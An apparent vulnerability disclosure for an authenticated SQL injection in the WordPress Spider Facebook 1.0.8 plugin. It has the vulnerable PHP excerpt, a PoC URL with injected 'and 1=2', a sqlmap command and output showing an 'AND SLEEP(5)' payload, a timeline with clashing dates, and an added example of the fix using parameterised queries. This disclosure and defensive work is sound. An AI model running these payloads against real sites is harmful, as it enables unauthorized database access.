
Wordpress Spider Facebook 1.0.8 Authenticated SQL Injection Vulnerability


    Code:
    ######################
    # Exploit Title : Wordpress Spider Facebook 1.0.8 Authenticated SQL Injection
     
    # Exploit Author : Claudio Viviani
     
    # Vendor Homepage : http://web-dorado.com/
     
    # Software Link : http://downloads.wordpress.org/plugin/spider-facebook.1.0.8.zip
     
    # Date : 2014-08-25
     
    # Tested on : Windows 7 / Mozilla Firefox
    #             Linux / Mozilla Firefox
    #             Linux / sqlmap 1.0-dev-5b2ded0
     
    ######################
     
    # Location :
    http://localhost/wp-content/plugins/plugins/spider-facebook/facebook.php
     
    ######################
     
    # Vulnerable code :
     
    function Spider_Facebook_manage()
    {
            require_once("facebook_manager.php");
            require_once("facbook_manager.html.php");
            if(!function_exists ('print_html_nav' ))
            require_once("nav_function/nav_html_func.php");
            global $wpdb;
            if(isset($_GET['id']))
            {
            $id=$_GET['id'];
            }
            else
            {
                    $id=0;
            }
     
     
    ######################
     
    # PoC Exploit:
     
    http://10.0.0.67/wordpress/wp-admin/admin.php?page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1 and 1=2
     
     
    # Exploit Code via sqlmap:
     
    sqlmap --cookie="INSERT_WORDPRESS_COOKIE_HERE" -u "http://10.0.0.67/wordpress/wp-admin/admin.php?page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1" -p id --dbms=mysql
     
    [21:27:40] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
    ...
    ...
    ...
    ---
    Place: GET
    Parameter: id
        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1 AND SLEEP(5)
     
    ---
     
     
    # PoC Video:
     
    https://www.youtube.com/watch?v=CcuvHLWnjZo
     
    ######################
     
    # Vulnerability Disclosure Timeline:
     
    2014-08-25:  Discovered vulnerability
    2014-09-04:  Vendor Notification (Web Customers Service Form)
    2014-08-05:  Vendor Response/Feedback
    2014-08-05:  Vendor Fix/Patch
    2014-08-05:  Public Disclosure
     
    #####################
     
    Discovered By : Claudio Viviani
                    http://www.homelab.it
     
                    https://www.facebook.com/homelabit
                    https://twitter.com/homelabit
                    https://plus.google.com/+HomelabIt1/
                    https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
     
    #####################
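The excerpt in the advisory copies `$_GET['id']` into `$id` with no validation. The following is an added example, not code from the original post or from the plugin: it places a concatenated lookup beside a validated, parameterised one, using an in-memory SQLite database through PDO. The table `spider_facebook_demo`, its row, and the function names are constructed for illustration, and the shape of the query is an assumption, since the plugin's actual query is not shown on the page.

```php
<?php
// Added example: stand-alone PDO/SQLite stand-in for the plugin's lookup.
// Table, columns and row are constructed; the plugin's real query is not on the page.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE spider_facebook_demo (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO spider_facebook_demo (id, title) VALUES (1, 'constructed row')");

// "Before": the raw GET value is concatenated into the statement, so any
// SQL fragment that follows the number becomes part of the query.
function lookup_vulnerable(PDO $db, string $rawId): array
{
    $sql = 'SELECT id, title FROM spider_facebook_demo WHERE id=' . $rawId;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// "After", step 1: accept only a non-negative integer and fall back to 0,
// mirroring the else-branch of the original excerpt.
function parse_id($rawId): int
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    return $id === false ? 0 : $id;
}

// "After", step 2: bind the validated value instead of concatenating it.
function lookup_hardened(PDO $db, $rawId): array
{
    $stmt = $db->prepare('SELECT id, title FROM spider_facebook_demo WHERE id = :id');
    $stmt->bindValue(':id', parse_id($rawId), PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// A normal id plus the two id values that appear in the advisory.
foreach (['1', '1 and 1=2', '1 AND SLEEP(5)'] as $raw) {
    printf("%-18s parsed id=%d, hardened rows=%d\n",
        "'$raw'", parse_id($raw), count(lookup_hardened($db, $raw)));
}

// With concatenation, the trailing condition becomes part of the WHERE
// clause and changes which rows match.
printf("vulnerable '1'         rows=%d\n", count(lookup_vulnerable($db, '1')));
printf("vulnerable '1 and 1=2' rows=%d\n", count(lookup_vulnerable($db, '1 and 1=2')));
```

Inside WordPress the same two steps are normally written with `absint()` for the cast and `$wpdb->prepare()` with a `%d` placeholder for the query.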